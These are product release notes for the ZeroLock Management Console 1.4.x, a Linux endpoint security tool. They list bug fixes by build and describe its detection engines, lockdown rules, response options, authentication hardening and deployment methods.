ZeroLock™ Management Console 1.4.x - Build Release Notes

Important Information Regarding ZeroLock™ Version 1.4.x

Build notes contain important information you should know before you install the ZeroLock solution.   Before installing this build, familiarize yourself with all the new features listed in this document. 


System requirements and update instructions

For more information on system requirements and installation instructions, see the following knowledge base articles:  

Minimum System Requirements

ZeroLock™ Update Instructions


Build 1.4.36

July 2023

Name

Description

SERVER-42

Previously blank, adding New User Role template now comes pre-filled with superuser role details.

SERVER-43

Fixed issue with New User Roles UI going blank after clicking Create.

SERVER-55

Fixed issue with Add New Group not opening.

SERVER-57

Fixed cause of "U:superuser - invalid login - no such user" messages in Dashboard Activity Logs for logged in superuser.

SERVER-61

Increased font for loading page on first time start of ZeroLock Management Console[MR1] .  Also, changed message to read:  “ZeroLock Management Portal[MR2]   is loading…”

ZERO-1085

Addressed issue ensuring MFA prompt is generated after setup of SSH-MFA.

 


Build 1.4.35

June 2023

Name

Description

ZERO-1152

Resolved issue with Recommended ruleset and start of Mariadb container. 

ZERO-1166

Resolved issue with fresh ZeroLock Management Console build failing.  

ZERO-1179

Improved the performance of tables when logging into a fresh browser.

ZERO-1180

Improved function call speed.

ZERO-1194

Enhanced initialization of endpoints in database thus improving endpoints startup times.

ZERO-1195

Added queueing to collector to improve endpoint scalability during potential high load times. 

ZERO-1206

Improved report generation and interaction with Activity Log.



Build 1.4.32

April 2023

ALERTS Homepage

  • Under the ACTIONS dropdown list, the Remediate Alert has been removed as redundant which reduces the available actions to three (3): Kill and Remediate Alert, Kill Alert, and Release Alert.
  • This same change can be found when looking at the Alerts Detail page as shown below.

ENDPOINTS Homepage

When viewing Endpoints, the options have changed in the ACTIONS drop-down menu.  The Shutdown option has been replaced with three (3) alternative options: 
  • DEACTIVATE ENDPOINT PROTECTION only turns off Baldur, leaving Tyr active.  With Baldur off, ZeroLock’s defenses are no longer active. When pressing deactivate, customers should expect the status icon to go red for a moment and then yellow until the protection is reactivated. The user can still access the in-UI shell in this state, but the system is totally unprotected. (NOTE:  This does a process restart for all monitored processes)
  • ACTIVATE ENDPOINT PROTECTION turns on Baldur, activating ZeroLock and protecting the system from attack. All functionality is available in this state.
  • UNINSTALL ENDPOINT AGENT deactivates ZeroLock protection and completely uninstalls both Baldur and Tyr from the system.

Single Sign-On (SSO)

  • Included in this build is support for Single Sign-On (SSO).  No longer do you need to add users to the ZeroLock server database.  Use the SSO feature to manage your organization's ZeroLock users from a known IDP.  

Multi-Tenancy

  • ZeroLock’s support of multi-tenancy allows an organization to create multiple tenants while keeping all tenants’ data isolated and separated.

Build 1.4.0

November 2022

NOTE: ZeroLock maintains the same efficacy and detection capabilities without internet or management console access. This capability is required for dark/air-gapped environments and certain embedded or IoT systems.

Malware Detection Engines

  • Ransomware: The Ransomware engine uses advanced behavioral detection algorithms to detect, stop, and remove/remediate ransomware no matter its form. ZeroLock detects both fileless and file-based malware. ZeroLock restores the filesystem to its preattack state, and prevents attackers from gaining persistence.

  • Cryptojacking: The Cryptojacking engine uses machine learning to detect, stop, and remove/remediate any crypto mining software.

  • Anti-Tampering: ZeroLock monitors for attempts to affect Agent files and disable agent

    Canary files are used to place “traps” around the file system to detect when a process

    attempts to access or modify a file or directory that it should not. One specific class of malware Canary files protect against is Wiperware. Using strategically placed Canary files in sensitive directories across the hard drive(s) of the system, ZeroLock can stop Wiperware attacks. Canary rules will undo any damage caused during an attack, identical to Ransomware remediation.

  • HASH/Signature checking: The Hash engine uses SHA-256 hashes to either Allow or Block a file from executing on a protected system. Hashes are not a part of the Vali Cyber advanced behavior detection for malware. By default, ZeroLock does not use hashes in its detection methods.

  • Lockdown Rules: The Lockdown Rules engines allow you to define and control what behavior processes on the protected system are allowed to perform. These are divided into three distinct types with an associated Rule Policy.

    • Rule Types:

      • File Access: Allow or restrict access to files for a specific process or process tree.

      • Network Access: Allow or restrict network communication and traffic for a specific process or process tree to or from external systems.

      • Program Execution: This functionality is like AppArmor or SELinux rules, except they simplify defining what processes/programs can access on the system. Program Execution rules are applied uniformly from a central location and across Linux flavors.

    • Implement best practices with Recommended Rules that are provided. Vali Cyber’s Threat Research Team creates the Recommended Rules based on industry best practices, known CVE’s, behavior of common malware, and MITRE framework mappings.

    • Rules are highly configurable, allowing granular control of the behavior of processes to execute, access files, and communicate with external systems.

    • ZeroLock server includes a Regex editor and tester to assist with rule creation allowing you to create and test rules before implementing them.

Authentication Hardening

  • Multifactor Authentication for SSH: Allows you to set up and control SSH access to systems in a centralized way to prevent credential theft attacks.

  • User management: Role-based access control allows for granular control over user permissions within the ZeroLock portal. Multifactor Authentication for user logins enforce MFA access to the ZeroLock portal.

File Cache

Automatic file restoration is done using a proprietary protected cache mechanism to facilitate remediation of damage or destroyed files, and to undo attempts the malware makes to make itself persistent. The cache is highly configurable, allowing users to select the maximum cache size and maximum size of files that can be backed up.

Role Based Access Control

The ZeroLock UI and API area all protected by fine-grained role-based access control rules. Users access to data and pages within the UI can be limited based on role. Roles are highly configurable and changes to role permissions take effect immediately, without requiring users to log out.

Threat response capabilities

Automatic response options – A complete collection of IoCs and IoAs is collected and available for an administrator or analyst to review at any time during or after an attack. Alerts can be delivered over SMTP by configuring email settings in the ZeroLock UI.

  • Do Nothing: This is an Alert Only setting. The processes are allowed to continue running.

  • Kill: This response Kills the process(es) involved in malicious behavior and an alert is issued.

  • Remediate: This response Kills the process(es) involved in malicious behavior, issues an alert, and then remediates any damage to files, attempts at persistence, and closes all network connections associated with the malicious process(es).

  • Suspend: This response pauses the process(es) involved in malicious behavior, and an alert is issued. Setting the response type to suspend gives an analyst time to review the alert and creates a decision point to allow the process to continue executing (Release) or to stop the processes identified in the attack (Kill) and undo any damage and attempts at persistence (Remediate).

  • Auto-Quarantine: This response type automatically quarantines impacted systems on a network, preventing lateral movement by attackers. Systems are only accessible through a command shell in the ZeroLock UI.

Threat hunting capabilities

Process trees on alerts are dynamically created from the point of incursion to the point of detection/remediation. Relevant information included about each process includes:

  • Processname

  • PID

  • Parent-childprocessrelationships

  • Executablepathandname

  • Executablehashes

  • Fullcommandlinearguments

  • IP connections received and initiated from/to the process

  • User and Group permissions

  • Files that are created, modified, or deleted

All IoCs and IoAs are available to be exported to JSON or CSV files or pushed to an external system via secure API’s.

ZeroLock Deployment

Endpoint Agent

No kernel module is required when installing the ZeroLock endpoint agent. ZeroLock can be installed on any Linux operating system running kernel version 3.5 or greater.

There are four options offered when deciding to deploy the ZeroLock endpoint agent. These options allow deployment automation with infrastructure tools such as Kubernetes, Ansible, Puppet or Chef. Installers:

  • Curl – copy & paste command
  • Wget – copy & paste command
  • self-extracting file
  • tar.gz file

Server Containers

The ZeroLock server is made up of four containers. The containers provide connectivity to the ZeroLock endpoint agent and the ZeroLock Portal. A tar.gz installer is provided for customer managed implementation.

ZeroLock endpoint agent container support

Deploy inside containers for self-protecting systems, sidecar with Kubernetes, or install directly on the host OS. The agent can be deployed as a part of the CI/CD pipeline integrating into existing Dev/Sec/Ops processes.

Reporting and Real-Time activity log

All user activity is available in real-time, including portal login and logouts, SSH sessions, policy and rule updates, and actions are taken on alerts. If relevant, the threat activity includes the current status, the system impacted, and the number of affected files. Endpoint agent activity, including new deployments, agent deactivations, agent detections, and alerts.
All data is exportable to CSV and/or JSON or accessible by external systems such as Splunk via secure API’s. The ability to create configurable ad-hoc reports from the activities and alert logs.

ZeroLock self-management

The new installer automatically updates old databases when you have deployed the on-Premises ZeroLock Server. ZeroLock Server supports multiple versions of the agent, allowing for testing new agents, features, and updates in either a test environment or targeting specific systems within your environment. The option to upgrade or downgrade an endpoint agent through the UI, individually or in bulk, assists in endpoint management. The endpoint agent and agent detection engines can be updated through data files uploaded via the UI